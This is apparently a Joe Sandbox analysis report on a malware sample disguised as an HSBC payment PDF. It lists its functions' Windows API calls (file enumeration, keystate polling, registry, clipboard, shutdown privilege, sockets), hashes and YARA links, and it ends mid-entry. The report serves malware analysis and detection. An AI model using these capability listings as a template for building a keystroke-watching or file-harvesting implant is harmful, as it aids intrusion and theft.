                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                                                                                    • API String ID: 0-559809668
                                                                                                                                                    • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                    • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                                                                                                    • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                    • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                                                                                    Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F128
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F13F
                                                                                                                                                      • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                                                    • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                    • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                                                                                    • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                    • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                                                                                    Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046A231
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                                                                                    • _memset.LIBCMT ref: 0046A2B2
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                                    • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                    • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                                                                                    • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                    • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                                                                                    Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00460097
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00460102
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                    • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                                                                                                    • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                    • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                                                                                                    Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1240663315-0
                                                                                                                                                    • Opcode ID: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                                                                                                                                                    • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                                                                                                    • Opcode Fuzzy Hash: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                                                                                                                                                    • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                                                                                                    Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                    • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                                                                                    • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                                                                                                                    • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                                                                                    • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                                                                                                                    Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F484
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F49F
                                                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 713712311-438819550
                                                                                                                                                    • Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                                                                                                                    • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                                                                                                                    • Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                                                                                                                    • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                                                                                                                    Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __itow__swprintf
                                                                                                                                                    • String ID: 3cA$_A
                                                                                                                                                    • API String ID: 674341424-3480954128
                                                                                                                                                    • Opcode ID: fbe09424ec1f83488ee8510728e08dc1cab6b0ad1b3a11546317e8ca54923645
                                                                                                                                                    • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                                                                                                                    • Opcode Fuzzy Hash: fbe09424ec1f83488ee8510728e08dc1cab6b0ad1b3a11546317e8ca54923645
                                                                                                                                                    • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                                                                                                                    Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                                                    • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                                                                                    • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                                                                                                                    • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                                                                                    • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                                                                                                                    Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 004762DC
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00476344
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279440585-0
                                                                                                                                                    • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                                                                                    • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                                                                                                                    • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                                                                                    • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                                                                                                    Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                                                                                      • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3744519093-0
                                                                                                                                                    • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                    • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                                                                                    • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                    • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                                                                                    Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0047679E
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00476821
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
